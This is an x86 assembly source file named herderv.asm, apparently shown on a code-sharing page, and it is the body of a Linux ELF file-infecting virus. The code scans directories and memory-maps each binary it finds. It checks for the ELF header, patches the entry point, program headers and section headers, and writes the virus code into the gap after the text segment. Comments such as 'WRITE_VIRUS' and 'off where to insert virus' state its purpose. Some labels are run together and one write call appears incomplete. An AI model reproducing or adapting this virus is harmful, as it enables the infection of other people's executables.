📄 herderv.asm
字号:
cmp word [esp+10],0x002e ; [esp+10]=dirent.d_name , 0x002e="." je skip cmp word [esp+10],0x2e2e ; 0x2e2e=".." je skip xor eax,eax mov al,[esp+DIRENT_SIZE+128+1] ; directory permissions add esp,10 ; [esp+10]=dirent.d_name push eax ; needed because we want to acess @scan ; the filename and the write permissions... call scan add esp,4 ; restore permissions sub esp,10 ; restore dirent.d_name skip: jmp readdir ;#################### CHECK_FILE #########################################check_file: ; allocate stack memory sub esp,FILE_STACK mov ebx,esi mov [esp+FILE_STACK-44],esi ; pointer to our filename;################### FOPEN ############################################fopen: mov eax,SYS_OPEN mov ecx,2 ; 2=O_RDWR mov edx,0 int 0x80 cmp eax,0 jg no_err jmp fopen_error ;#################### NO_ERROR ######################################### no_err: mov [esp+FILE_STACK-4],eax ; [esp+50-4]=fd ; check files lenght (in the stat structure) mov eax,SYS_STAT mov ebx,esi ; esi=filename sub esp,STAT_SIZE mov ecx,esp int 0x80 ; storing the file lenght into eax mov eax,[esp+20] ; [esp+0x14]=filesize add esp,STAT_SIZE ; restore stack mov [esp+FILE_STACK-8],eax ; storing filesize on stack ;#################### MMAP ###############################################mmap: ; here we're going to map out file into mem(*see the syntax in ; asm/mmap.h) mov eax,SYS_MMAP mov ecx,[esp+FILE_STACK-8] ; ecx=file lenght mov edx,[esp+FILE_STACK-4] ; edx=fd sub esp,MMAP_SIZE mov dword [esp],0 ; int start mov [esp+4],ecx ; [esp+4]=ecx=file lenght=int len mov dword [esp+8],READ_WRITE ; prot=READ_WRITE mov dword [esp+12],MAP_PRIVATE; flag=MAP_PRIVATE mov dword [esp+16],edx ; [esp+16]=edx=int fd mov dword [esp+20],0 ; offset=0 mov ebx,esp ; ebx=pointer to our ; mmap_arg_struc - structure int 0x80 add esp,MMAP_SIZE ; restore stack cmp eax,-1 jne ok_mmap jmp err_mmap ;#################### OK_MMAP ############################################# ok_mmap: mov [esp+FILE_STACK-12],eax ; eax=pointer to the mapped file ;#################### IS_ELF ##############################################is_elf: ; check if our mapped file has "ELF" at the beginning of the ; file mov edx,[esp+FILE_STACK-12] ; edx=pointer to mapped file mov ebx,[edx] ; [edx] should be "ELF" mov eax,0x464c457f ; "ELF." cmp ebx,eax je ok_elf jmp no_elf;################## OK_ELF ############################################### ok_elf: ;################ READ_EHDR ############################################# read_ehdr: mov eax,[esp+FILE_STACK-8] ; file lenght cmp eax,0x130 jl near err_to_small ; jmp if(lenght<0x130) ;############### OK_EHDR ################################################ok_ehdr: mov esi,[esp+FILE_STACK-12] mov eax,[esi+0x18] mov [esp+FILE_STACK-16],eax ; e_entry mov eax,[esi+0x1c] mov [esp+FILE_STACK-20],eax ; e_phoff mov eax,[esi+0x20] mov [esp+FILE_STACK-24],eax ; e_shoff mov eax,dword [esi+0x2c] and eax,0xffff mov [esp+FILE_STACK-28],eax ; e_phnum mov eax,dword [esi+0x30] and eax,0xffff mov [esp+FILE_STACK-32],eax ; e_shnum ;############## CHK_SPACE ################################################# chk_space: mov esi,[esp+FILE_STACK-12] mov ebx,[esp+FILE_STACK-20] ; e_phoff add esi,ebx ; move to first segment of PHDR mov ecx,[esi+32*3+8] ; phdr[3].p_vaddr - FLAGS: RW(data ; segment ???) mov eax,[esi+32*3+16] ; phdr[3].p_filesz mov ebx,[esi+32*2+16] ; phdr[2].p_filesz mov [esp+FILE_STACK-36],ebx ; phdr[2].p_filesz mov eax,[esi+32*2+8] ; phdr[2].p_vaddr - FLAGS: RE(text ; segment !!!) add ebx,[esi+32*2+8] ; phdr[2].p_filesz + phdr[2].p_vaddr sub ecx,ebx ; if(ecx < HERDERV_SZ ) ... mov eax,HERDERV_SZ cmp ecx,eax jl near err_to_small ; there is no space where we can ; write herderv :( mov ebx,[esp+FILE_STACK-28] ; e_phnum cmp ebx,5 jl near err_to_small patch_ehdr: mov ebx,[esp+FILE_STACK-16] ; e_entry add ebx,[esp+FILE_STACK-36] ; phdr[2].p_filesz mov esi,[esp+FILE_STACK-12] ; ptr to mapped file mov [esi+0x18],ebx ; fix entry point patch_shoff: add dword [esi+32],HERDERV_SZpatch_phdr: mov ecx,[esp+FILE_STACK-28] ; e_phnum mov edx,[esp+FILE_STACK-20] ; e_phoff mov esi,[esp+FILE_STACK-12] ; ptr to mapped file add esi,edx ; move to the first seg of PHDR mov eax,[esp+FILE_STACK-36] ; phdr[2].p_filesz;off where to ; insert virus read_phdr: cmp dword [esi+4],0 ; is this the .text segment ??? ; ; p_offset=0=[esi+4] jne no_phdrpatch add dword [esi+16],HERDERV_SZ ; patching phdr[2].p_filesz add dword [esi+20],HERDERV_SZ ; patching phdr[2].p_memsz no_phdrpatch: cmp eax,[esi+4] jg dont_patch_ph add dword [esi+4],HERDERV_SZ ; patching p_offset dont_patch_ph: add esi,0x20 ; offset to next phdr seg loop read_phdr patch_shdr: mov ecx,[esp+FILE_STACK-32] ; e_shnum mov edx,[esp+FILE_STACK-24] ; e_shoff mov esi,[esp+FILE_STACK-12] ; ptr to mapped file add esi,edx ; move to first seg of SHDR mov eax,[esp+FILE_STACK-36] ; off where to insert virus ; ; phdr[2].p_filesz read_shdr: mov ebx,[esi+16] ; sh_offset add ebx,[esi+20] ; sh_size cmp ebx,eax jne no_shdrpatch ; patching .text section add dword [esi+20],HERDERV_SZ ; patching sh_size no_shdrpatch: cmp [esi+16],eax jl dont_patch_sh add dword [esi+16],HERDERV_SZ ; patching sh_offset dont_patch_sh: add esi,40 ; move to next shdr seg in the ; SHDR table loop read_shdrown_e_entry: mov esi,dword [0x8048376] ; current entry_point ;################## WRITE_VIRUS ########################################### write_virus: mov eax,[esp+FILE_STACK-4] ; our old fd mov [esp+FILE_STACK-2],eax mov ebx,eax ; fd ; writting the patched ehdr to file mov eax,SYS_WRITE mov ecx,[esp+FILE_STACK-12] ; ptr to our mapped file mov edx,[esp+FILE_STACK-36] ; virus_offset int 0x80 ; hehe ... no more way out.. ;)))) mov eax,SYS_WRITE mov ecx,esi mov edx,HERDERV_SZ int 0x80 mov eax,19 ; lseek() mov ecx,[esp+FILE_STACK-36] add ecx,HERDERV_SZ mov edx,0 ; SEEK_SET int 0x80 mov ecx,[esp+FILE_STACK-36] mov edx,[esp+FILE_STACK-8] ; file lenght sub edx,ecx ; remaining lenght to write mov eax,SYS_WRITE add ecx,[esp+FILE_STACK-12] ; ptr to mapped file ; now we must fix the old entry point so that prog can execute mov eax,19 mov ecx,[esp+FILE_STACK-36] add ecx,0x127 mov edx,0 int 0x80 add ecx,0x808504 sub edx,ecx push edx mov ecx,esp mov edx,4 mov eax,SYS_WRITE int 0x80 add esp,4 err_to_small:;#################### NO_ELF ##############################################no_elf: mov eax,SYS_MUNMAP mov ebx,[esp+FILE_STACK-12] ; ebx=pointer to mapped file mov ecx,[esp+FILE_STACK-8] ; ecx=map lenght=file lenght int 0x80 ;#################### ERR_MMAP ############################################err_mmap: mov eax,SYS_CLOSE mov ebx,[esp+FILE_STACK-4] int 0x80;#################### FOPEN_ERROR #########################################fopen_error: add esp,FILE_STACK ret;#################### ERR_READDIR #########################################err_readdir: add esp,DIRENT_SIZE ; restore stack mov eax,SYS_CLOSE mov ebx,[esp+128+2] ; fd int 0x80 ; chdir to previous curent dir mov eax,SYS_CHDIR mov ebx,esp int 0x80 ;mov eax,dir_err ;call print_string ;###################### ERR_STAT & ERR_SCAN ############################### err_stat: err_scan: ;mov eax,scan_e ;call print_string add esp,134 ; restore stack used for the ##### variables ##### ret ; return to main ;###################### EXIT #############################################exit: mov eax,SYS_EXIT int 0x80⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -